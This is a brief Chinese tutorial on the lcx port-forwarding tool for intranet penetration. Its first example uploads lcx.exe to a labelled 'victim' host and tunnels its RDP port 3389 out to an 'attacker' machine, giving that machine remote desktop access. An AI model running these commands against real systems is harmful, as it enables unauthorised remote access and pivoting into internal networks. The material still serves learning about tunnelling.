簡介
lcx是一款強大的內網端口轉發工具,用於將內網主機開放的內部端口映射到外網主機(有公網IP)任意端口。它是一款命令行工具,當然也可以在有權限的webshell下執行,正因如此lcx常被認爲是一款黑客入侵工具,lcx在內網入侵滲透中起着重要的角色。lcx進行端口轉發的原理就是使不同端口之間形成一個迴路。它常用於外網連接內網3389端口。
使用
1.將本地接口轉發到遠程主機的端口。
攻擊者ip:192.168.1.2
受害者ip:192.168.1.3
將lcx.exe上傳到受害者主機上,執行:
lcx.exe -slave 192.168.1.2 8080 192.168.1.3 3389
然後攻擊者主機上執行:
lcx.exe -listen 8080 9999
這樣就將受害者主機的3389服務轉發到攻擊者本地的9999端口上了。只要攻擊者訪問127.0.0.1:9999就可以連接到受害者的遠程桌面
2、將本地端口轉發到本地的另一個接口
lcx -tran 8080 192.168.1.22 80
這句命令是將192.168.1.22主機的80端口映射到8080端口上,這樣訪問192.168.1.22的8080端口就相當於訪問80端口。
注意:在linux環境下的lcx是portmap